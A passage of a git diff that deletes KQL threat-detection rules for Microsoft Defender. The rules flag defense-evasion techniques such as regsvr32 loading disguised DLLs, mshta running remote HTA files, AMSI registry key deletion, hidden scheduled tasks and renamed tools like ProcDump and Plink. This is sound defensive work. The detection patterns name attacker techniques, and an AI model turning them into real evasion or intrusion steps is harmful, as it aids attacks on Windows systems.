tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume")) \ No newline at end of file diff --git a/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql b/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql deleted file mode 100644 index 9a184d08..00000000 --- a/Defense Evasion/Registry_Modification_Via_Regini.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Eli Salem, Sander Wiebing, oscd.community -// Date: 2020/10/08 -// Level: low -// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. -// Tags: attack.t1112, attack.defense_evasion -DeviceProcessEvents -| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and (not(ProcessCommandLine matches regex ":[^ \\\\]")) \ No newline at end of file diff --git a/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql b/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql deleted file mode 100644 index 2709a976..00000000 --- a/Defense Evasion/Registry_Persistence_via_Service_in_Safe_Mode.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/04/04 -// Level: high -// Description: Detects the modification of the registry to allow a driver or service to persist in Safe Mode. -// Tags: attack.defense_evasion, attack.t1564.001 -DeviceRegistryEvents -| where (RegistryValueData =~ "Service" and (RegistryKey contains "\\Control\\SafeBoot\\Minimal" or RegistryKey contains "\\Control\\SafeBoot\\Network") and RegistryKey endswith "\\(Default)") and (not((InitiatingProcessFolderPath =~ "C:\\WINDOWS\\system32\\msiexec.exe" and (RegistryKey endswith "\\Control\\SafeBoot\\Minimal\\SAVService\\(Default)" or RegistryKey endswith "\\Control\\SafeBoot\\Network\\SAVService\\(Default)")))) \ No newline at end of file diff --git a/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql b/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql deleted file mode 100644 index d1cd996f..00000000 --- a/Defense Evasion/Regsvr32_DLL_Execution_With_Suspicious_File_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), frack113 -// Date: 2021/11/29 -// Level: high -// Description: Detects the execution of REGSVR32.exe with DLL files masquerading as other files -// Tags: attack.defense_evasion, attack.t1218.010 -DeviceProcessEvents -| where (ProcessCommandLine endswith ".bin" or ProcessCommandLine endswith ".bmp" or ProcessCommandLine endswith ".cr2" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".eps" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".ico" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpg" or ProcessCommandLine endswith ".nef" or ProcessCommandLine endswith ".orf" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".raw" or ProcessCommandLine endswith ".sr2" or ProcessCommandLine endswith ".temp" or ProcessCommandLine endswith ".tif" or ProcessCommandLine endswith ".tiff" or ProcessCommandLine endswith ".tmp" or ProcessCommandLine endswith ".rtf" or ProcessCommandLine endswith ".txt") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") \ No newline at end of file diff --git a/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql b/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql deleted file mode 100644 index e8f1f303..00000000 --- a/Defense Evasion/Regsvr32_DLL_Execution_With_Uncommon_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/07/17 -// Level: medium -// Description: Detects a "regsvr32" execution where the DLL doesn't contain a common file extension. -// Tags: attack.defense_evasion, attack.t1574, attack.execution -DeviceProcessEvents -| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine contains ".ax" or ProcessCommandLine contains ".cpl" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".ocx") or isnull(ProcessCommandLine)))) and (not((ProcessCommandLine contains ".bav" or ProcessCommandLine contains ".ppl"))) \ No newline at end of file diff --git a/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql b/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql deleted file mode 100644 index 887d6512..00000000 --- a/Defense Evasion/Regsvr32_Execution_From_Highly_Suspicious_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/26 -// Level: high -// Description: Detects execution of regsvr32 where the DLL is located in a highly suspicious locations -// Tags: attack.defense_evasion, attack.t1218.010 -DeviceProcessEvents -| where (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") and ((ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains "\\Windows\\Registration\\CRMLog" or ProcessCommandLine contains "\\Windows\\System32\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\System32\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\drivers\\color\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\PRINTERS\\" or ProcessCommandLine contains "\\Windows\\System32\\spool\\SERVERS\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks_Migrated\\" or ProcessCommandLine contains "\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\com\\dmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\FxsTmp\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or ProcessCommandLine contains "\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or ProcessCommandLine contains "\\Windows\\Tasks\\" or ProcessCommandLine contains "\\Windows\\Tracing\\") or ((ProcessCommandLine contains " \"C:\\" or ProcessCommandLine contains " C:\\" or ProcessCommandLine contains " 'C:\\" or ProcessCommandLine contains "D:\\") and (not((ProcessCommandLine contains "C:\\Program Files (x86)\\" or ProcessCommandLine contains "C:\\Program Files\\" or ProcessCommandLine contains "C:\\ProgramData\\" or ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " \"C:\\Windows\\" or ProcessCommandLine contains " 'C:\\Windows\\"))))) and (not((ProcessCommandLine =~ "" or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql b/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql deleted file mode 100644 index 734cedc4..00000000 --- a/Defense Evasion/Regsvr32_Execution_From_Potential_Suspicious_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/26 -// Level: medium -// Description: Detects execution of regsvr32 where the DLL is located in a potentially suspicious location. -// Tags: attack.defense_evasion, attack.t1218.010 -DeviceProcessEvents -| where (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and (FolderPath endswith "\\regsvr32.exe" or ProcessVersionInfoOriginalFileName =~ "REGSVR32.EXE") \ No newline at end of file diff --git a/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql b/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql deleted file mode 100644 index 4b8796c3..00000000 --- a/Defense Evasion/RemoteFXvGPUDisablement_Abuse_Via_AtomicTestHarnesses.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/07/13 -// Level: high -// Description: Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisablementCommand" or ProcessCommandLine contains "Invoke-ATHRemoteFXvGPUDisableme" \ No newline at end of file diff --git a/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql b/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql deleted file mode 100644 index 5e3e031a..00000000 --- a/Defense Evasion/Remote_Access_Tool_-_RURAT_Execution_From_Unusual_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/19 -// Level: medium -// Description: Detects execution of Remote Utilities RAT (RURAT) from an unusual location (outside of 'C:\Program Files') -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ((FolderPath endswith "\\rutserv.exe" or FolderPath endswith "\\rfusclient.exe") or ProcessVersionInfoProductName =~ "Remote Utilities") and (not((FolderPath startswith "C:\\Program Files\\Remote Utilities" or FolderPath startswith "C:\\Program Files (x86)\\Remote Utilities"))) \ No newline at end of file diff --git a/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql b/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql deleted file mode 100644 index 86bc8bbe..00000000 --- a/Defense Evasion/Remote_Code_Execute_via_Winrm.vbs.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Julia Fomina, oscd.community -// Date: 2020/10/07 -// Level: medium -// Description: Detects an attempt to execute code or create service on remote host via winrm.vbs. -// Tags: attack.defense_evasion, attack.t1216 -DeviceProcessEvents -| where (ProcessCommandLine contains "winrm" and ProcessCommandLine contains "invoke Create wmicimv2/Win32_" and ProcessCommandLine contains "-r:http") and (FolderPath endswith "\\cscript.exe" or ProcessVersionInfoOriginalFileName =~ "cscript.exe") \ No newline at end of file diff --git a/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql b/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql deleted file mode 100644 index 9b77679a..00000000 --- a/Defense Evasion/Remote_File_Download_Via_Findstr.EXE.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/10/05 -// Level: medium -// Description: Detects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry. - -// Tags: attack.defense_evasion, attack.t1218, attack.t1564.004, attack.t1552.001, attack.t1105 -DeviceProcessEvents -| where (ProcessCommandLine contains "findstr" or FolderPath endswith "findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE") and ((ProcessCommandLine contains " -v " or ProcessCommandLine contains " /v ") and (ProcessCommandLine contains " -l " or ProcessCommandLine contains " /l ") and ProcessCommandLine contains "\\\\") \ No newline at end of file diff --git a/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql b/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql deleted file mode 100644 index ccf52622..00000000 --- a/Defense Evasion/Remote_XSL_Execution_Via_Msxsl.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/11/09 -// Level: high -// Description: Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. -// Tags: attack.defense_evasion, attack.t1220 -DeviceProcessEvents -| where ProcessCommandLine contains "http" and FolderPath endswith "\\msxsl.exe" \ No newline at end of file diff --git a/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql b/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql deleted file mode 100644 index d0784cd7..00000000 --- a/Defense Evasion/Remotely_Hosted_HTA_File_Executed_Via_Mshta.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/08 -// Level: high -// Description: Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file -// Tags: attack.defense_evasion, attack.execution, attack.t1218.005 -DeviceProcessEvents -| where (ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://" or ProcessCommandLine contains "ftp://") and (FolderPath endswith "\\mshta.exe" or ProcessVersionInfoOriginalFileName =~ "MSHTA.EXE") \ No newline at end of file diff --git a/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql b/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql deleted file mode 100644 index 990767da..00000000 --- a/Defense Evasion/Removal_Of_AMSI_Provider_Registry_Keys.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/06/07 -// Level: high -// Description: Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection. -// Tags: attack.defense_evasion, attack.t1562.001 -DeviceRegistryEvents -| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey endswith "{2781761E-28E0-4109-99FE-B9D127C57AFE}" or RegistryKey endswith "{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}") \ No newline at end of file diff --git a/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql b/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql deleted file mode 100644 index 0655e39c..00000000 --- a/Defense Evasion/Removal_Of_Index_Value_to_Hide_Schedule_Task_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/26 -// Level: medium -// Description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query" -// Tags: attack.defense_evasion, attack.t1562 -DeviceRegistryEvents -| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "Index") \ No newline at end of file diff --git a/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql b/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql deleted file mode 100644 index e7a8dadc..00000000 --- a/Defense Evasion/Removal_Of_SD_Value_to_Hide_Schedule_Task_-_Registry.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sittikorn S -// Date: 2022/04/15 -// Level: medium -// Description: Remove SD (Security Descriptor) value in \Schedule\TaskCache\Tree registry hive to hide schedule task. This technique is used by Tarrask malware -// Tags: attack.defense_evasion, attack.t1562 -DeviceRegistryEvents -| where (ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree" and RegistryKey contains "SD") \ No newline at end of file diff --git a/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql b/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql deleted file mode 100644 index 3b5298d1..00000000 --- a/Defense Evasion/Removal_of_Potential_COM_Hijacking_Registry_Keys.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2020/05/02 -// Level: medium -// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys. -These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks. - -// Tags: attack.defense_evasion, attack.t1112 -DeviceRegistryEvents -| where ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey endswith "\\shell\\open\\command") and (not(((InitiatingProcessFolderPath endswith "\\Dropbox.exe" and RegistryKey contains "\\Dropbox.") or (InitiatingProcessFolderPath endswith "\\Everything.exe" and RegistryKey contains "\\Everything.") or InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Microsoft Office\\root\\integration\\integrator.exe" or (InitiatingProcessFolderPath endswith "\\installer.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Java\\" and RegistryKey contains "\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}") or (InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\Updates\\")) or (InitiatingProcessFolderPath endswith "\\installer.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Opera\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Opera\\")) or (InitiatingProcessFolderPath contains "peazip" and RegistryKey contains "\\PeaZip.") or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe" or InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe" and RegistryKey contains "\\wireshark-capture-file")))) \ No newline at end of file diff --git a/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql b/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql deleted file mode 100644 index c887b9ee..00000000 --- a/Defense Evasion/Renamed_AutoHotkey.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali -// Date: 2023/02/07 -// Level: medium -// Description: Detects execution of a renamed autohotkey.exe binary based on PE metadata fields -// Tags: attack.defense_evasion -DeviceProcessEvents -| where (ProcessVersionInfoProductName contains "AutoHotkey" or ProcessVersionInfoFileDescription contains "AutoHotkey" or (ProcessVersionInfoOriginalFileName in~ ("AutoHotkey.exe", "AutoHotkey.rc"))) and (not(((FolderPath endswith "\\AutoHotkey.exe" or FolderPath endswith "\\AutoHotkey32.exe" or FolderPath endswith "\\AutoHotkey32_UIA.exe" or FolderPath endswith "\\AutoHotkey64.exe" or FolderPath endswith "\\AutoHotkey64_UIA.exe" or FolderPath endswith "\\AutoHotkeyA32.exe" or FolderPath endswith "\\AutoHotkeyA32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU32.exe" or FolderPath endswith "\\AutoHotkeyU32_UIA.exe" or FolderPath endswith "\\AutoHotkeyU64.exe" or FolderPath endswith "\\AutoHotkeyU64_UIA.exe") or FolderPath contains "\\AutoHotkey"))) \ No newline at end of file diff --git a/Defense Evasion/Renamed_CURL.EXE_Execution.kql b/Defense Evasion/Renamed_CURL.EXE_Execution.kql deleted file mode 100644 index 5fedd523..00000000 --- a/Defense Evasion/Renamed_CURL.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2023/09/11 -// Level: medium -// Description: Detects the execution of a renamed "CURL.exe" binary based on the PE metadata fields -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "curl.exe" or ProcessVersionInfoFileDescription =~ "The curl executable") and (not(FolderPath contains "\\curl")) \ No newline at end of file diff --git a/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql b/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql deleted file mode 100644 index f1565826..00000000 --- a/Defense Evasion/Renamed_CreateDump_Utility_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/09/20 -// Level: high -// Description: Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory -// Tags: attack.defense_evasion, attack.t1036, attack.t1003.001 -DeviceProcessEvents -| where (((ProcessCommandLine contains " -u " and ProcessCommandLine contains " -f " and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains " --full " and ProcessCommandLine contains " --name " and ProcessCommandLine contains ".dmp")) or ProcessVersionInfoOriginalFileName =~ "FX_VER_INTERNALNAME_STR") and (not(FolderPath endswith "\\createdump.exe")) \ No newline at end of file diff --git a/Defense Evasion/Renamed_FTP.EXE_Execution.kql b/Defense Evasion/Renamed_FTP.EXE_Execution.kql deleted file mode 100644 index a2a27522..00000000 --- a/Defense Evasion/Renamed_FTP.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Victor Sergeev, oscd.community -// Date: 2020/10/09 -// Level: medium -// Description: Detects the execution of a renamed "ftp.exe" binary based on the PE metadata fields -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "ftp.exe" and (not(FolderPath endswith "\\ftp.exe")) \ No newline at end of file diff --git a/Defense Evasion/Renamed_Jusched.EXE_Execution.kql b/Defense Evasion/Renamed_Jusched.EXE_Execution.kql deleted file mode 100644 index 059e77e2..00000000 --- a/Defense Evasion/Renamed_Jusched.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Markus Neis, Swisscom -// Date: 2019/06/04 -// Level: high -// Description: Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group -// Tags: attack.execution, attack.defense_evasion, attack.t1036.003 -DeviceProcessEvents -| where (ProcessVersionInfoFileDescription in~ ("Java Update Scheduler", "Java(TM) Update Scheduler")) and (not(FolderPath endswith "\\jusched.exe")) \ No newline at end of file diff --git a/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql b/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql deleted file mode 100644 index e67eb044..00000000 --- a/Defense Evasion/Renamed_Mavinject.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Florian Roth -// Date: 2022/12/05 -// Level: high -// Description: Detects the execution of a renamed version of the "Mavinject" process. Which can be abused to perform process injection using the "/INJECTRUNNING" flag -// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1055.001, attack.t1218.013 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName in~ ("mavinject32.exe", "mavinject64.exe")) and (not((FolderPath endswith "\\mavinject32.exe" or FolderPath endswith "\\mavinject64.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Renamed_MegaSync_Execution.kql b/Defense Evasion/Renamed_MegaSync_Execution.kql deleted file mode 100644 index b1b03fbb..00000000 --- a/Defense Evasion/Renamed_MegaSync_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Sittikorn S -// Date: 2021/06/22 -// Level: high -// Description: Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti. -// Tags: attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "megasync.exe" and (not(FolderPath endswith "\\megasync.exe")) \ No newline at end of file diff --git a/Defense Evasion/Renamed_Msdt.EXE_Execution.kql b/Defense Evasion/Renamed_Msdt.EXE_Execution.kql deleted file mode 100644 index a28480e4..00000000 --- a/Defense Evasion/Renamed_Msdt.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2022/06/03 -// Level: high -// Description: Detects the execution of a renamed "Msdt.exe" binary -// Tags: attack.defense_evasion, attack.t1036.003 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "msdt.exe" and (not(FolderPath endswith "\\msdt.exe")) \ No newline at end of file diff --git a/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql b/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql deleted file mode 100644 index fe83139c..00000000 --- a/Defense Evasion/Renamed_NirCmd.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: X__Junior (Nextron Systems) -// Date: 2024/03/11 -// Level: high -// Description: Detects the execution of a renamed "NirCmd.exe" binary based on the PE metadata fields. -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "NirCmd.exe" and (not((FolderPath endswith "\\nircmd.exe" or FolderPath endswith "\\nircmdc.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Renamed_Office_Binary_Execution.kql b/Defense Evasion/Renamed_Office_Binary_Execution.kql deleted file mode 100644 index 88a5736c..00000000 --- a/Defense Evasion/Renamed_Office_Binary_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/20 -// Level: high -// Description: Detects the execution of a renamed office binary -// Tags: attack.defense_evasion -DeviceProcessEvents -| where ((ProcessVersionInfoOriginalFileName in~ ("Excel.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "WinWord.exe")) or (ProcessVersionInfoFileDescription in~ ("Microsoft Access", "Microsoft Excel", "Microsoft OneNote", "Microsoft Outlook", "Microsoft PowerPoint", "Microsoft Publisher", "Microsoft Word", "Sent to OneNote Tool"))) and (not((FolderPath endswith "\\EXCEL.exe" or FolderPath endswith "\\excelcnv.exe" or FolderPath endswith "\\MSACCESS.exe" or FolderPath endswith "\\MSPUB.EXE" or FolderPath endswith "\\ONENOTE.EXE" or FolderPath endswith "\\ONENOTEM.EXE" or FolderPath endswith "\\OUTLOOK.EXE" or FolderPath endswith "\\POWERPNT.EXE" or FolderPath endswith "\\WINWORD.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql b/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql deleted file mode 100644 index 98720000..00000000 --- a/Defense Evasion/Renamed_PingCastle_Binary_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2024/01/11 -// Level: high -// Description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. -// Tags: attack.execution, attack.t1059, attack.defense_evasion, attack.t1202 -DeviceProcessEvents -| where ((ProcessVersionInfoOriginalFileName in~ ("PingCastleReporting.exe", "PingCastleCloud.exe", "PingCastle.exe")) or (ProcessCommandLine contains "--scanner aclcheck" or ProcessCommandLine contains "--scanner antivirus" or ProcessCommandLine contains "--scanner computerversion" or ProcessCommandLine contains "--scanner foreignusers" or ProcessCommandLine contains "--scanner laps_bitlocker" or ProcessCommandLine contains "--scanner localadmin" or ProcessCommandLine contains "--scanner nullsession" or ProcessCommandLine contains "--scanner nullsession-trust" or ProcessCommandLine contains "--scanner oxidbindings" or ProcessCommandLine contains "--scanner remote" or ProcessCommandLine contains "--scanner share" or ProcessCommandLine contains "--scanner smb" or ProcessCommandLine contains "--scanner smb3querynetwork" or ProcessCommandLine contains "--scanner spooler" or ProcessCommandLine contains "--scanner startup" or ProcessCommandLine contains "--scanner zerologon") or ProcessCommandLine contains "--no-enum-limit" or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--level Full") or (ProcessCommandLine contains "--healthcheck" and ProcessCommandLine contains "--server ")) and (not((FolderPath endswith "\\PingCastleReporting.exe" or FolderPath endswith "\\PingCastleCloud.exe" or FolderPath endswith "\\PingCastle.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Renamed_Plink_Execution.kql b/Defense Evasion/Renamed_Plink_Execution.kql deleted file mode 100644 index 76dd4df8..00000000 --- a/Defense Evasion/Renamed_Plink_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/06/06 -// Level: high -// Description: Detects the execution of a renamed version of the Plink binary -// Tags: attack.defense_evasion, attack.t1036 -DeviceProcessEvents -| where (ProcessVersionInfoOriginalFileName =~ "Plink" or (ProcessCommandLine contains " -l forward" and ProcessCommandLine contains " -P " and ProcessCommandLine contains " -R ")) and (not(FolderPath endswith "\\plink.exe")) \ No newline at end of file diff --git a/Defense Evasion/Renamed_ProcDump_Execution.kql b/Defense Evasion/Renamed_ProcDump_Execution.kql deleted file mode 100644 index 09852431..00000000 --- a/Defense Evasion/Renamed_ProcDump_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2019/11/18 -// Level: high -// 